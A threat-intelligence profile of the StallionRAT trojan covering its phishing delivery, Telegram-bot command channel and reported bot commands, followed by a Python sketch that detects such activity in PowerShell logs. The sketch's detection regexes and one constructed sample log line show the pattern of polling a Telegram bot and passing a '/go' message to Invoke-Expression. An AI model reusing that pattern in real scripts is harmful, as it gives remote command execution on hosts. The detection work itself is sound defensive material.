StallionRAT
StallionRAT is a malware family used in campaigns reported by BI.ZONE and attributed to the threat actor it tracks as Cavalry Werewolf, which overlaps with YoroTrooper and several other clusters, including Tomiris. The activity was observed between May and August 2025 and targeted the Russian public sector, including state agencies and organizations in the energy, mining, and manufacturing sectors. Initial access was achieved through targeted phishing emails impersonating Kyrgyz government officials; the emails delivered RAR archives that installed StallionRAT, and in at least one case the actor used a compromised legitimate email account associated with the Kyrgyz Republic’s regulatory authority.
According to BI.ZONE's reporting, StallionRAT is written in Go, PowerShell, and Python. It enables attackers to execute arbitrary commands, load additional files, and exfiltrate collected data. Data exfiltration is performed via a Telegram bot. Reported Telegram bot commands include /list, /go [DeviceID] [command], and /upload [DeviceID]; the /go command runs the supplied command through Invoke-Expression. The operators also executed commands to gather device information on compromised hosts. Tools observed alongside this activity included ReverseSocks5Agent and ReverseSocks5, indicating reverse SOCKS5 proxy capability on compromised systems.
High-confidence indicators and artifacts directly mentioned in the reporting include delivery via RAR archives, the Telegram bot command strings /list, /go [DeviceID] [command], and /upload [DeviceID], and filenames in English and Arabic observed by BI.ZONE. BI.ZONE further assessed that Cavalry Werewolf’s ties to Tomiris support a hypothesis of Kazakhstan affiliation, consistent with Microsoft’s prior attribution of Tomiris to the Kazakhstan-based actor Storm-0473.
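The behaviour described above, a PowerShell component that polls a Telegram bot for operator commands and hands the text of a /go message to Invoke-Expression, leaves a distinctive combination of strings in PowerShell script block logging. The following is an added detection sketch, not code from the page or from BI.ZONE: it scores constructed ScriptBlock-style log lines on four indicator classes and only escalates when the Telegram Bot API is combined with remote-command polling or with Invoke-Expression, so that a legitimate notification bot or an ordinary iex call on its own does not alert. The log layout, the <TOKEN> placeholder and the $DeviceID variable name are assumptions; the Telegram Bot API URL shape (api.telegram.org/bot<token>/<method>) is public API knowledge.

```python
"""Detection sketch for Telegram-bot-driven PowerShell command execution.

Added example, not code from the page or from BI.ZONE. Operates on constructed
PowerShell ScriptBlock-style log lines (Event ID 4104 text; layout assumed).
"""
import re
from dataclasses import dataclass

# Indicator classes. The command strings /list, /go and /upload come from the
# reporting summarised above; the Bot API URL shape is public Telegram API knowledge.
INDICATORS = {
    # any call to the Telegram Bot API (inbound polling or outbound send)
    "telegram_bot_api": re.compile(
        r"api\.telegram\.org/bot[^/\s'\"]*/(getUpdates|sendMessage|sendDocument)", re.I),
    # getUpdates is how a script receives messages, i.e. pulls operator commands
    "polls_for_commands": re.compile(r"/getUpdates\b", re.I),
    # text reaching Invoke-Expression (or its alias) is executed as code
    "invoke_expression": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
    # operator command grammar: /list, /go <DeviceID> <command>, /upload <DeviceID>
    "bot_command_string": re.compile(r"(?<![\w/])/(list\b|go\s+\S+\s+\S|upload\s+\S+)"),
}


@dataclass
class Finding:
    line_no: int
    severity: str
    matched: list
    text: str


def classify(text: str):
    """Return (severity, matched_indicator_names) for one log line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if "telegram_bot_api" in hits and "invoke_expression" in hits:
        return "high", hits      # bot traffic plus code execution in one block
    if "telegram_bot_api" in hits and (
            "polls_for_commands" in hits or "bot_command_string" in hits):
        return "medium", hits    # bot used as a command channel, execution not yet seen
    if "telegram_bot_api" in hits:
        return "low", hits       # outbound-only use; could be a benign notifier
    return "none", hits          # iex alone is far too common to alert on


def scan(lines):
    """Scan an iterable of log lines and return the non-benign findings."""
    findings = []
    for i, line in enumerate(lines, 1):
        sev, hits = classify(line)
        if sev != "none":
            findings.append(Finding(i, sev, hits, line))
    return findings


# Constructed sample log lines (not real telemetry), one per case of interest.
SAMPLE_LOGS = [
    # benign admin activity
    "4104 ScriptBlockText: Get-ChildItem C:\\Users | Select-Object Name, LastWriteTime",
    # legitimate outbound notification bot: Bot API present, nothing executed
    "4104 ScriptBlockText: Invoke-RestMethod -Uri 'https://api.telegram.org/bot<TOKEN>/sendMessage' "
    "-Body @{chat_id=$chat; text='nightly backup finished'}",
    # polling the bot for messages: command-channel behaviour, no execution visible
    "4104 ScriptBlockText: $upd = Invoke-RestMethod -Uri 'https://api.telegram.org/bot<TOKEN>/getUpdates?offset=' + $off",
    # StallionRAT-style pattern: a /go message addressed to this device reaches Invoke-Expression
    "4104 ScriptBlockText: $upd = Invoke-RestMethod 'https://api.telegram.org/bot<TOKEN>/getUpdates'; "
    "if ($msg -like \"/go $DeviceID *\") { Invoke-Expression ($msg -replace '^/go \\S+ ', '') }",
    # Invoke-Expression alone: must not alert
    "4104 ScriptBlockText: iex (Get-Content .\\build-helpers.ps1 -Raw)",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.severity:6s} {', '.join(f.matched)}")
```

Run against real 4104 events, the same logic would be fed the ScriptBlockText field; the severity split matters because Telegram notifier scripts are common in operations teams and the distinguishing signal is inbound polling (getUpdates) or the command grammar, not the API domain by itself.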
Groups observed using it
2 distinct threat actors attributed by public researchers.
StallionRAT is no different in that it is written in Go, PowerShell, and Python, and enables the attackers to execute arbitrary commands, load additional files, and exfiltrate collected data using a Telegram bot.
Recent activity
2 sources tracked across advisories, community write-ups, and news.
Custom remote access trojan used in espionage campaigns attributed to the Cavalry Werewolf/YoroTrooper cluster.
A remote access trojan (written in Go, PowerShell, and Python) that supports command execution, additional payload loading, and data exfiltration via a Telegram-bot-based interface.